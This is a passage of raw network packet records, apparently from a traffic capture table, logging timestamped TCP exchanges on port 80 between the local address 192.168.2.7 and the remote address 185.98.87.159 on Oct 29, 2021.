                                                                                                                          Oct 29, 2021 17:06:52.581403017 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.581413031 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.581429005 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.581474066 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.624269962 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.624303102 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.624423981 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.626933098 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.626965046 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.626977921 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.626991034 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.627060890 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.627101898 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.632422924 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.632448912 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.632464886 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.632482052 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.632498026 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.632514000 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.632559061 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.632581949 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.632868052 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.632890940 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.632906914 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.632925034 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.632941008 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.632951021 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.632956028 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.632972002 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.632987022 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.632992983 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.633007050 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.633029938 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.633105040 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.633121967 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.633137941 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.633153915 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.633177996 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.633212090 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.633213043 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.633230925 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.633281946 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.676373005 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.676400900 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.676497936 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.678879023 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.678901911 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.678920031 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.678936005 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.678973913 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.678991079 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.684632063 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.684655905 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.684669018 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.684680939 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.684694052 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.684710979 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.684890032 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.684905052 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.684914112 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.684931993 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.684947968 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.684993982 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.685034990 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.685112000 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.685128927 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.685255051 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.685271978 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.685286999 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.685309887 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.685340881 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.685357094 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.685412884 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.685497999 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.685513973 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.685532093 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.685548067 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.685589075 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.685635090 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.728303909 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.728332996 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.728378057 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.730592012 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.730618954 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.730637074 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.730654001 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.730689049 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.730719090 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.736584902 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.736613035 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.736629963 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.736646891 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.736665010 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.736682892 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.736697912 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.736701012 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.736713886 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.736745119 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.736762047 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.736792088 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.736829996 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.736839056 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.736859083 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.736869097 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.736891031 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.736920118 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.736951113 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.736968040 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.736995935 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.737272024 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.737292051 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.737308979 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.737324953 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.737368107 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.780623913 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.780651093 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.780695915 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.780725002 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.782361984 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.782381058 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.782393932 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.782407045 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.782444954 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.782466888 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.782493114 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.782531977 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.786473036 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.788518906 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.788537979 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.788553953 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.788570881 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.788629055 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.788635015 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.788654089 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.788655996 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.788671017 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.788697958 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.788701057 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.788738012 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.788808107 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.788824081 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.788841963 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.788867950 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.788877010 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.788883924 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.788908958 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.789361000 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.789378881 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.789396048 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.789433002 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.789446115 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.789449930 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.789469004 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.789500952 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.789532900 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.789549112 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.789598942 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.832524061 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.832551003 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.832638025 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.863447905 CEST4982680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:52.915395021 CEST8049826185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:56.903105974 CEST4982780192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:56.954896927 CEST8049827185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:56.954989910 CEST4982780192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:56.955110073 CEST4982780192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:56.955132961 CEST4982780192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.031225920 CEST8049827185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.031348944 CEST4982780192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.055697918 CEST4982780192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.094507933 CEST4982880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.107410908 CEST8049827185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.146581888 CEST8049828185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.146672964 CEST4982880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.146878004 CEST4982880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.146898031 CEST4982880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.224498034 CEST8049828185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.224610090 CEST4982880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.224843025 CEST4982880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.283004999 CEST8049828185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.754010916 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.806044102 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.806169033 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.806314945 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.901840925 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.947045088 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.947071075 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.947082996 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.947098970 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.947113037 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.947130919 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.947148085 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.947163105 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.947180033 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.947182894 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.947196960 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.947244883 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.999188900 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999216080 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999228001 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999241114 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999258041 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999274969 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999283075 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.999290943 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999310017 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999326944 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999345064 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999353886 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.999383926 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.999399900 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999418020 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999434948 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999452114 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999469042 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999476910 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.999488115 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999504089 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999510050 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.999521017 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999538898 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.999538898 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:57.999563932 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.051510096 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.051537037 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.051553965 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.051570892 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.051587105 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.051614046 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.051660061 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.051662922 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.052006960 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.052026033 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.052042961 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.052061081 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.052077055 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.052124977 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.052217007 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.052236080 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.052253008 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.052268982 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.052268982 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.052329063 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.052385092 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.052402973 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.052419901 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.052437067 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.052455902 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.052485943 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.103619099 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.103648901 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.103666067 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.103682995 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.103699923 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.103715897 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.103741884 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.103806973 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.103876114 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.103903055 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.103945971 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.103982925 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.104011059 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.104027987 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.104034901 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.104047060 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.104077101 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.104180098 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.104197979 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.104213953 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.104232073 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.104243994 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.104290009 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.104444981 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.104464054 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.104479074 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.104491949 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.104496002 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.104548931 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.155936956 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.155966997 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.155978918 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.155991077 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156003952 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156018019 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156037092 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156054974 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156070948 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156111956 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156137943 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.156162977 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156209946 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.156232119 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.156236887 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156255007 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156286955 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156303883 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.156318903 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156371117 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.156642914 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156661034 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156672955 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156689882 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156711102 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.156719923 CEST8049829185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.156747103 CEST4982980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:58.156753063 CEST8049829185.98.87.159192.168.2.7
